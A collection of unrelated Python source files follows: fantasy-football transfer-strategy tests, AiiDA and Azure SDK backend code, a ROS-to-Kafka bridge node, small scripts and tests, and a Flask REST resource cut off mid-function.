def test_count_expected_outputs_no_chips_no_constraints():
# No constraints or chips, expect 3**num_gameweeks strategies
count = count_expected_outputs(
3,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={},
)
assert count == 3 ** 3
# Max hit 0
# Include:
# (0, 0, 0), (0, 0, 1), (0, 0, 2), (0, 1, 0), (0, 1, 1), (0, 1, 2),
# (0, 2, 0), (0, 2, 1), (1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 1, 0), (1, 1, 1)
# Exclude:
# (0, 2, 2), (1, 1, 2), (1, 2, 0), (1, 2, 1), (1, 2, 2), (2, 0, 0), (2, 0, 1),
# (2, 0, 2), (2, 1, 0), (2, 1, 1), (2, 1, 2), (2, 2, 0), (2, 2, 1), (2, 2, 2)
def test_count_expected_outputs_no_chips_zero_hit():
count = count_expected_outputs(
3,
free_transfers=1,
max_total_hit=0,
next_gw=1,
max_transfers=2,
chip_gw_dict={},
)
assert count == 13
# Start with 2 FT and no unused
# Include:
# (0, 0, 0), (1, 1, 1), (1, 1, 2), (1, 2, 0), (1, 2, 1), (1, 2, 2), (2, 0, 1),
# (2, 0, 2), (2, 1, 0), (2, 1, 1), (2, 1, 2), (2, 2, 0), (2, 2, 1), (2, 2, 2)
# Exclude:
# (0, 0, 1), (0, 0, 2), (0, 1, 0), (0, 1, 1), (0, 1, 2), (0, 2, 0), (0, 2, 1),
# (0, 2, 2), (1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 1, 0), (2, 0, 0)
def test_count_expected_outputs_no_chips_2ft_no_unused():
count = count_expected_outputs(
3,
free_transfers=2,
max_total_hit=None,
allow_unused_transfers=False,
next_gw=1,
max_transfers=2,
)
assert count == 14
# Wildcard, 2 weeks, no constraints
# Strategies:
# (0, 0), (0, 1), (0, 2), (0, 'W'), (1, 0), (1, 1), (1, 2), (1, 'W'), (2, 0),
# (2, 1), (2, 2), (2, 'W'), ('W', 0), ('W', 1), ('W', 2)
def test_count_expected_wildcard_allowed_no_constraints():
count = count_expected_outputs(
2,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chips_allowed": ["wildcard"]},
2: {"chips_allowed": ["wildcard"]},
3: {"chips_allowed": ["wildcard"]},
},
)
assert count == 15
# Bench boost, 2 weeks, no constraints
# Strategies:
# (0, 0), (0, 1), (0, 2), (0, 'B0'), (0, 'B1'), (0, 'B2'), (1, 0), (1, 1), (1, 2),
# (1, 'B0'), (1, 'B1'), (1, 'B2'), (2, 0), (2, 1), (2, 2), (2, 'B0'), (2, 'B1'),
# (2, 'B2'), ('B0', 0), ('B0', 1), ('B0', 2), ('B1', 0), ('B1', 1), ('B1', 2),
# ('B2', 0), ('B2', 1), ('B2', 2),
def count_expected_bench_boost_allowed_no_constraints():
count = count_expected_outputs(
2,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chips_allowed": ["bench_boost"]},
2: {"chips_allowed": ["bench_boost"]},
3: {"chips_allowed": ["bench_boost"]},
},
)
assert count == 27
# Force playing wildcard in first week
# Strategies:
# ("W",0), ("W,1), ("W",2)
def count_expected_play_wildcard_no_constraints():
count = count_expected_outputs(
2,
free_transfers=1,
max_total_hit=None,
allow_unused_transfers=True,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chip_to_play": "wildcard", "chips_allowed": []},
2: {"chip_to_play": None, "chips_allowed": []},
},
)
assert count == 3
# Force playing free hit in first week, 2FT, don't allow unused
# Strategies:
# (0,0), ("F",1), ("F",2)
def count_expected_play_free_hit_no_unused():
count = count_expected_outputs(
2,
free_transfers=2,
max_total_hit=None,
allow_unused_transfers=False,
next_gw=1,
max_transfers=2,
chip_gw_dict={
1: {"chip_to_play": "free_hit", "chips_allowed": []},
2: {"chip_to_play": None, "chips_allowed": []},
},
)
assert count == 3
|
py | 1a4bb41ac9a3c24c7cb349f25cfa72b74b14f58d | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Django implementations for the `Computer` entity and collection."""
# pylint: disable=import-error,no-name-in-module
from django.db import IntegrityError, transaction
from aiida.backends.djsite.db import models
from aiida.common import exceptions
from ..computers import BackendComputerCollection, BackendComputer
from . import entities
from . import utils
class DjangoComputer(entities.DjangoModelEntity[models.DbComputer], BackendComputer):
"""Django implementation for `BackendComputer`."""
# pylint: disable=too-many-public-methods
MODEL_CLASS = models.DbComputer
def __init__(self, backend, **kwargs):
"""Construct a new `DjangoComputer` instance."""
super().__init__(backend)
self._dbmodel = utils.ModelWrapper(models.DbComputer(**kwargs))
@property
def uuid(self):
return str(self._dbmodel.uuid)
def copy(self):
"""Create an unstored clone of an already stored `Computer`."""
if not self.is_stored:
raise exceptions.InvalidOperation('You can copy a computer only after having stored it')
dbomputer = models.DbComputer.objects.get(pk=self.pk)
dbomputer.pk = None
newobject = self.__class__.from_dbmodel(dbomputer) # pylint: disable=no-value-for-parameter
return newobject
def store(self):
"""Store the `Computer` instance."""
# As a first thing, I check if the data is valid
sid = transaction.savepoint()
try:
# transactions are needed here for Postgresql:
# https://docs.djangoproject.com/en/1.5/topics/db/transactions/#handling-exceptions-within-postgresql-transactions
self._dbmodel.save()
transaction.savepoint_commit(sid)
except IntegrityError:
transaction.savepoint_rollback(sid)
raise ValueError('Integrity error, probably the hostname already exists in the database')
return self
@property
def is_stored(self):
return self._dbmodel.id is not None
@property
def name(self):
return self._dbmodel.name
@property
def description(self):
return self._dbmodel.description
@property
def hostname(self):
return self._dbmodel.hostname
def get_metadata(self):
return self._dbmodel.metadata
def set_metadata(self, metadata):
self._dbmodel.metadata = metadata
def get_name(self):
return self._dbmodel.name
def set_name(self, val):
self._dbmodel.name = val
def get_hostname(self):
return self._dbmodel.hostname
def set_hostname(self, val):
self._dbmodel.hostname = val
def get_description(self):
return self._dbmodel.description
def set_description(self, val):
self._dbmodel.description = val
def get_scheduler_type(self):
return self._dbmodel.scheduler_type
def set_scheduler_type(self, scheduler_type):
self._dbmodel.scheduler_type = scheduler_type
def get_transport_type(self):
return self._dbmodel.transport_type
def set_transport_type(self, transport_type):
self._dbmodel.transport_type = transport_type
class DjangoComputerCollection(BackendComputerCollection):
"""Collection of `Computer` instances."""
ENTITY_CLASS = DjangoComputer
@staticmethod
def list_names():
return list(models.DbComputer.objects.filter().values_list('name', flat=True))
def delete(self, pk):
"""Delete the computer with the given pk."""
from django.db.models.deletion import ProtectedError
try:
models.DbComputer.objects.filter(pk=pk).delete()
except ProtectedError:
raise exceptions.InvalidOperation(
'Unable to delete the requested computer: there'
'is at least one node using this computer'
)
|
py | 1a4bb45ce4df7358592b5b62a646935b0310f3cf | from setuptools import setup, find_packages
setup(
name = 'store',
version = '0.0.2-p3',
packages = find_packages(),
install_requires = [
"Flask==1.1.2",
"Flask-Login==0.5.0",
"Flask-WTF==0.14.3",
"Werkzeug==1.0.1",
"requests==2.25.1"
],
url = 'http://cottagelabs.com/',
author = 'Cottage Labs',
author_email = '[email protected]',
description = 'Provision of a web API wrapper for storage system',
license = 'MIT',
classifiers = [
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Copyheart',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
],
)
|
py | 1a4bb48b9c95bb676b9726795084b0a452f12e16 | import numpy as np
from sklearn import datasets
from lightgbm.sklearn import LGBMRegressor
from hummingbird.ml import convert
import onnxruntime
import torch
x, y = datasets.load_wine(return_X_y=True)
x = x.astype(np.float32)
model = LGBMRegressor(n_estimators=10)
model.fit(x, y)
preds = model.predict(x)
pytorch_model = convert(model, "pytorch")
torch.onnx.export(
pytorch_model.model,
(torch.from_numpy(x)),
"model.onnx",
input_names=["input"],
output_names=["output"],
dynamic_axes={"input": {0: "batch"}, "output": {0: "batch"}},
)
np.savez_compressed(
open("io.npz", "wb"), input=x[:1], output=preds[:1],
)
# sanity check - onnxruntime inference
sess = onnxruntime.InferenceSession("model.onnx")
outputs = sess.run(None, {"input": x[:1]})[0][:, 0]
assert np.allclose(outputs, preds[:1])
|
py | 1a4bb4c572765c2dec88c8dbb9299ce134f4801b | # Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import pytest
import main
def test_main(capsys):
main.main()
out, _ = capsys.readouterr()
expected = "Completed Task #0."
assert expected in out
def test_env_vars():
with pytest.raises(Exception, match=r".*failed.*"):
main.main(fail_rate="0.999999")
def test_bad_env_vars(capsys):
main.main(fail_rate="2") # Does not fail, so retry is not triggered
out, _ = capsys.readouterr()
assert "Invalid FAIL_RATE env var value" in out
def test_run_script():
output = (
subprocess.run(
["python3", "main.py"],
stdout=subprocess.PIPE,
check=True,
)
.stdout.strip()
.decode()
)
assert "Completed" in output
my_env = {"FAIL_RATE": "0.99999999"}
with pytest.raises(subprocess.CalledProcessError, match=r".*non-zero.*"):
subprocess.run(
["python3", "main.py"],
env=my_env,
stderr=subprocess.PIPE,
check=True,
)
|
py | 1a4bb582dc329d2cb2ff060a8acc7ad67c5a7621 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class GitTest(Package):
"""Mock package that uses git for fetching."""
homepage = "http://www.git-fetch-example.com"
version('git', branch='master', git='to-be-filled-in-by-test')
def install(self, spec, prefix):
pass
|
py | 1a4bb634cfcdb033cf8038a3525aee6d107280e4 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
"""LoadBalancerFrontendIPConfigurationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.LoadBalancerFrontendIPConfigurationListResult"]
"""Gets all the load balancer frontend IP configurations.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerFrontendIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_07_01.models.LoadBalancerFrontendIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LoadBalancerFrontendIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'} # type: ignore
def get(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
frontend_ip_configuration_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FrontendIPConfiguration"
"""Gets load balancer frontend IP configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param frontend_ip_configuration_name: The name of the frontend IP configuration.
:type frontend_ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FrontendIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_07_01.models.FrontendIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FrontendIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'} # type: ignore
|
py | 1a4bb7512bd4eba4776444348e89436ab1e85ac6 | #!/usr/bin/env python
import rospy
from rospy_message_converter import message_converter
from rospy_message_converter import json_message_converter
import rosbridge_library.internal.ros_loader as ros_loader
from kafka import KafkaProducer
from kafka import KafkaConsumer
from TokenProvider import TokenProvider
from json import dumps
from json import loads
from confluent.schemaregistry.client import CachedSchemaRegistryClient
from confluent.schemaregistry.serializers import MessageSerializer
class Topic:
def __init__(self, kafka_topic, ros_topic, ros_msg_type, avro_subject=None, avro_file=""):
self.kafka_topic = kafka_topic
self.ros_topic = ros_topic
self.ros_msg_type = ros_msg_type
self.avro_subject = avro_subject
self.avro_file = avro_file
def kafka_or_avro_log(self):
return ("AVRO", "KAFKA")[self.avro_subject!=None]
class KafkaTopicToROS:
def __init__(self, kafka_topic, ros_topic_list=[], avro_subject=None):
self.kafka_topic = kafka_topic
self.ros_topics = ros_topic_list
self.avro_subject = avro_subject
class ROSTopic:
def __init__(self, ros_topic_name, ros_topic_msg_type, ros_publisher =None):
self.ros_topic_name = ros_topic_name
self.ros_topic_msg_type = ros_topic_msg_type
self.ros_publisher = ros_publisher
class comm_bridge():
def __init__(self):
# initialize node
rospy.init_node("comm_bridge")
rospy.on_shutdown(self.shutdown)
# Retrieve parameters from launch file
# Global Kafka parameters
local_server = rospy.get_param("~local_server", False)
bootstrap_server = rospy.get_param("~bootstrap_server", "localhost:9092")
schema_server = rospy.get_param("~schema_server", "http://localhost:8081/")
self.use_ssl = rospy.get_param("~use_ssl", False)
self.use_avro = rospy.get_param("~use_avro", False)
self.nan_as_str = rospy.get_param("~nan_as_str", False)
self.oauth_token = rospy.get_param("~oauth_token", False)
self.use_strict_mode = rospy.get_param("~use_strict_mode", True)
self.group_id = rospy.get_param("~group_id", None)
if (self.group_id == "no-group"):
self.group_id = None
if (self.use_ssl):
self.ssl_cafile = rospy.get_param("~ssl_cafile", '../include/certificate.pem')
self.ssl_keyfile = rospy.get_param("~ssl_keyfile", "../include/kafka.client.keystore.jks")
self.ssl_password = rospy.get_param("~ssl_password", "password")
self.ssl_security_protocol = rospy.get_param("~ssl_security_protocol", "SASL_SSL")
self.ssl_sasl_mechanism = rospy.get_param("~ssl_sasl_mechanism", "PLAIN")
self.sasl_plain_username = rospy.get_param("~sasl_plain_username", "username")
self.sasl_plain_password = rospy.get_param("~sasl_plain_password", "password")
if (self.oauth_token):
self.ssl_security_protocol = rospy.get_param("~ssl_security_protocol", "SASL_PLAINTEXT")
self.ssl_sasl_mechanism = rospy.get_param("~ssl_sasl_mechanism", "OAUTHBEARER")
self.sasl_oauth_client_id = rospy.get_param("~sasl_oauth_client_id", "client_id")
self.sasl_oauth_client_secret = rospy.get_param("~sasl_oauth_client_secret", "client_secret")
self.oauth_token_url = rospy.get_param("~oauth_token_url", "")
# from Kafka to ROS topics parameters
list_from_kafka_topics = rospy.get_param("~list_from_kafka", [])
self.list_from_kafka = []
for kafka_item in list_from_kafka_topics:
self.topic_list = []
# list topic new format at yaml file
if "ros_topic_list" in kafka_item:
for ros_item in kafka_item["ros_topic_list"]:
# TODO: check if some value is missing
ros_t_name = "from_kafka/"+ros_item["ros_topic_name"]
ros_t_msg = ros_item["ros_topic_msg_type"]
msg_func = ros_loader.get_message_class(ros_t_msg)
ros_pub = rospy.Publisher(ros_t_name, msg_func, queue_size=10)
self.topic_list.append(ROSTopic(ros_t_name,ros_t_msg, ros_pub))
## TODO: check if some value is missing
#only one ROS topic at yaml file (old format)
else:
ros_t_name = "from_kafka/"+kafka_item["ros_topic_name"]
ros_t_msg = kafka_item["ros_topic_msg_type"]
msg_func = ros_loader.get_message_class(ros_t_msg)
ros_pub = rospy.Publisher(ros_t_name, msg_func, queue_size=10)
self.topic_list.append(ROSTopic(ros_t_name,ros_t_msg, ros_pub))
self.list_from_kafka.append(KafkaTopicToROS(kafka_item["kafka_topic"], self.topic_list))
# from ROS to Kafka topics parameters
list_to_kafka_topics = rospy.get_param("~list_to_kafka", [])
self.list_to_kafka = []
for item in list_to_kafka_topics:
# TODO: check if some value is missing
if self.use_avro:
if "avro_file" in item.keys():
self.list_to_kafka.append(Topic(item["kafka_topic"], "to_kafka/"+item["ros_topic_name"],
item["ros_topic_msg_type"], item["avro_subject"], item["avro_file"]))
else:
self.list_to_kafka.append(Topic(item["kafka_topic"], "to_kafka/"+item["ros_topic_name"],
item["ros_topic_msg_type"], item["avro_subject"]))
else:
self.list_to_kafka.append(Topic(item["kafka_topic"], "to_kafka/"+item["ros_topic_name"],
item["ros_topic_msg_type"]))
# Create schema registry connection and serializer
if self.use_avro:
self.client = CachedSchemaRegistryClient(url=schema_server)
self.serializer = MessageSerializer(self.client)
if (self.use_avro):
for topic in self.list_to_kafka:
rospy.loginfo("Loading schema for " + topic.avro_subject + " from registry server")
_, topic.avro_schema, _ = self.client.get_latest_schema(topic.avro_subject)
if topic.avro_file != "":
rospy.loginfo("Loading schema for " + topic.avro_subject + " from file " + topic.avro_file + " as it does not exist in the server")
topic.avro_schema = avro.schema.parse(open(topic.avro_file).read())
if topic.avro_schema is None:
rospy.logerr("cannot get schema for " + topic.avro_subject)
# Create kafka consumer
# TODO: check possibility of using serializer directly (param value_deserializer from KafkaConsumer)
for kafka_topic in self.list_from_kafka:
if(self.use_ssl):
kafka_topic.consumer = KafkaConsumer(kafka_topic.kafka_topic,
bootstrap_servers=bootstrap_server,
security_protocol=self.ssl_security_protocol,
ssl_check_hostname=False,
ssl_cafile=self.ssl_cafile,
ssl_keyfile=self.ssl_keyfile,
sasl_mechanism=self.ssl_sasl_mechanism,
ssl_password=self.ssl_password,
sasl_plain_username=self.sasl_plain_username,
sasl_plain_password=self.sasl_plain_password
)
elif(self.oauth_token):
topic.consumer = KafkaConsumer(kafka_topic.kafka_topic,
bootstrap_servers=bootstrap_server,
enable_auto_commit=True,
security_protocol="SASL_PLAINTEXT",
sasl_mechanism="OAUTHBEARER",
value_deserializer=lambda x: loads(x.decode('utf-8')),
sasl_oauth_token_provider=TokenProvider(tokenURL=self.oauth_token_url,
client_id=self.sasl_oauth_client_id,
client_secret=self.sasl_oauth_client_secret)
)
else:
kafka_topic.consumer = KafkaConsumer(kafka_topic.kafka_topic,
bootstrap_servers=bootstrap_server,
auto_offset_reset='latest',
consumer_timeout_ms=5000,
group_id=self.group_id
)
# Import msg type
#msg_func = ros_loader.get_message_class(kafka_topic.ros_msg_type)
# Subscribe to ROS topic of interest
#topic.publisher = rospy.Publisher(topic.ros_topic, msg_func, queue_size=10)
#rospy.logwarn("Using {} MSGs from KAFKA: {} -> ROS: {}".format(topic.ros_msg_type, topic.kafka_topic, topic.ros_topic))
# Create kafka producer
# TODO: check possibility of using serializer directly (param value_serializer from KafkaProducer)
for topic in self.list_to_kafka:
if(self.use_ssl):
topic.producer = KafkaProducer(bootstrap_servers=bootstrap_server,
security_protocol=self.ssl_security_protocol,
ssl_check_hostname=False,
ssl_cafile=self.ssl_cafile,
ssl_keyfile=self.ssl_keyfile,
sasl_mechanism=self.ssl_sasl_mechanism,
ssl_password=self.ssl_password,
sasl_plain_username=self.sasl_plain_username,
sasl_plain_password=self.sasl_plain_password
)
elif(self.oauth_token):
topic.producer = KafkaProducer(bootstrap_servers=bootstrap_server,
value_serializer=lambda x: dumps(x).encode('utf-8'),
security_protocol="SASL_PLAINTEXT",
sasl_mechanism="OAUTHBEARER",
sasl_oauth_token_provider=TokenProvider(tokenURL=self.oauth_token_url,
client_id=self.sasl_oauth_client_id,
client_secret=self.sasl_oauth_client_secret)
)
else:
topic.producer = KafkaProducer(bootstrap_servers=bootstrap_server)
# ROS does not allow a change in msg type once a topic is created. Therefore the msg
# type must be imported and specified ahead of time.
msg_func = ros_loader.get_message_class(topic.ros_msg_type)
# Subscribe to the topic with the chosen imported message type
rospy.Subscriber(topic.ros_topic, msg_func, self.callback, topic)
rospy.logwarn("Using {} MSGs from ROS: {} -> KAFKA: {}".format(topic.ros_msg_type, topic.ros_topic, topic.kafka_topic))
def callback(self, msg, topic):
# Convert from ROS Msg to Dictionary
msg_as_dict = message_converter.convert_ros_message_to_dictionary(msg)
# also print as json for debugging purposes
msg_as_json = json_message_converter.convert_ros_message_to_json(msg)
if self.nan_as_str:
msg_as_json = msg_as_json.replace("NaN", '"NaN"')
# Output msg to ROS and send to Kafka server
rospy.loginfo("Sending from ROS topic {} to Kafka topic {}: {}".format(topic.ros_topic, topic.kafka_topic, msg_as_json))
# Convert from Dictionary to Kafka message
# this way is slow, as it has to retrieve last schema
# msg_as_serial = self.serializer.encode_record_for_topic(self.kafka_topic, msg_as_dict)
if (self.use_avro):
try:
msg_as_serial = self.serializer.encode_record_with_schema(topic.kafka_topic, topic.avro_schema, msg_as_dict)
topic.producer.send(topic.kafka_topic, value=msg_as_serial)
except Exception as e:
if topic.kafka_topic is None:
rospy.logwarn("kafka_topic is None")
elif topic.avro_schema is None:
rospy.logwarn("Tryed connect with the topic: " + topic.kafka_topic + ", but the avro_schema is None. Was the schema registry?")
else:
rospy.logwarn("Cannot publish to " + topic.kafka_topic + " with schema " + topic.avro_schema.name + ". Probably bad schema name on registry")
else:
try:
topic.producer.send(topic.kafka_topic, value=msg_as_json)
except Exception as e:
if topic.kafka_topic is None:
rospy.logwarn("kafka_topic is None")
else:
rospy.logwarn("Cannot publish to " + topic.kafka_topic + ". Probably bad topic name on registry")
def run(self):
while not rospy.is_shutdown():
for kafka_topic in self.list_from_kafka:
for kafka_msg in kafka_topic.consumer:
for ros_topic in kafka_topic.ros_topics:
if (self.use_avro):
try:
# Convert Kafka message to Dictionary
msg_as_dict = self.serializer.decode_message(kafka_msg.value)
# Convert Dictionary to ROS Msg
ros_msg = message_converter.convert_dictionary_to_ros_message(kafka_topic.ros_msg_type, msg_as_dict, self.use_strict_mode)
# Publish to ROS topic only the first topic parsered
ros_topic.ros_publisher.publish(ros_msg)
break
except ValueError as e:
rospy.logwarn(str(e) + ': time to debug!')
else:
try:
msg_func = ros_loader.get_message_class(ros_topic.ros_topic_msg_type)
ros_msg = json_message_converter.convert_json_to_ros_message(ros_topic.ros_topic_msg_type, kafka_msg.value, self.use_strict_mode)
rospy.loginfo(" Kafka topic {} to ROS topic {}: {}".format(kafka_topic.kafka_topic, ros_topic.ros_topic_name, kafka_msg.value))
# Publish to ROS topic only the first topic parsered
ros_topic.ros_publisher.publish(ros_msg)
#publish
rospy.loginfo("Sending from Kafka topic {} to ROS topic {}: {}".format(kafka_topic.kafka_topic, ros_topic.ros_topic_name, msg_func))
break
except ValueError as ve:
rospy.logwarn("Cannot parser kafka msg {} to ROS topic {}: {}. Exception: {}".format(kafka_topic.kafka_topic, ros_topic.ros_topic_name, msg_func, str(ve)))
def shutdown(self):
rospy.loginfo("Shutting down")
if __name__ == "__main__":
try:
node = comm_bridge()
node.run()
except rospy.ROSInterruptException:
pass
rospy.loginfo("Exiting")
|
py | 1a4bb77c4da937cecd23e049c057d74b5661bc04 | # Generated by Django 2.2 on 2019-05-21 20:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cse', '0030_doctors_gender'),
]
operations = [
migrations.AddField(
model_name='doctors',
name='tel_no',
field=models.CharField(default=None, max_length=20),
),
]
|
py | 1a4bb896241557ee90a7f50e26868c019de65d85 | # -*- coding:utf-8 -*-
import os
from concurrent.futures.thread import ThreadPoolExecutor
from flask_restful import Resource, reqparse, request
from flask import g, app
from common.log import loggers
from common.audit_log import audit_log
from common.db import DB
from common.utility import uuid_prefix, salt_api_for_product
from common.sso import access_required
import json
from common.xlsx import Xlsx
from fileserver.git_fs import gitlab_project, gitlab_project_name
from system.user import update_user_privilege, update_user_product
from common.const import role_dict
from fileserver.rsync_fs import rsync_config
logger = loggers()
parser = reqparse.RequestParser()
parser.add_argument("host_id", type=str, required=True, trim=True)
parser.add_argument("target_id", type=str, default='', trim=True)
parser.add_argument("target", type=str, default='', trim=True)
parser.add_argument("IP", type=str, default='', trim=True)
parser.add_argument("location", type=str, default='', trim=True)
parser.add_argument("model", type=str, default='', trim=True)
parser.add_argument("type", type=str, default='', trim=True)
parser.add_argument("project", type=str, default='', trim=True)
parser.add_argument("client", type=str, default='', trim=True)
parser.add_argument("pool", type=str, default='', trim=True)
parser.add_argument("path", type=str, default='', trim=True)
parser.add_argument("key_word", type=str, default='', trim=True)
parser.add_argument("file_name", type=str, default='', trim=True)
parser.add_argument("cipher", type=str, default='', trim=True)
class Target(Resource):
@access_required(role_dict["common_user"])
def get(self, target_id):
db = DB()
status, result = db.select_by_id("target", target_id)
db.close_mysql()
if status is True:
if result:
return {"data": result, "status": True, "message": ""}, 200
else:
return {"status": False, "message": "%s does not exist" % target_id}, 404
else:
return {"status": False, "message": result}, 500
@access_required(role_dict["product"])
def delete(self, target_id):
db = DB()
status, result = db.delete_by_id("target", target_id)
db.close_mysql()
logger.info('delete:' + str(result))
if status is not True:
logger.error("Delete product error: %s" % result)
return {"status": False, "message": result}, 500
if result is 0:
return {"status": False, "message": "%s does not exist" % target_id}, 404
return {"status": True, "message": ""}, 200
@access_required(role_dict["product"])
def put(self, target_id):
args = parser.parse_args()
logger.info(args['host_id'])
args["id"] = target_id
logger.info('id:' + target_id)
del args['path'], args['key_word'], args['file_name'], args['target_id'], args['cipher']
target = args
db = DB()
status, result = db.select_by_id('target', target_id)
origion_IP = result['IP']
host_id = result['host_id']
args['host_id'] = host_id
if origion_IP != args['IP']:
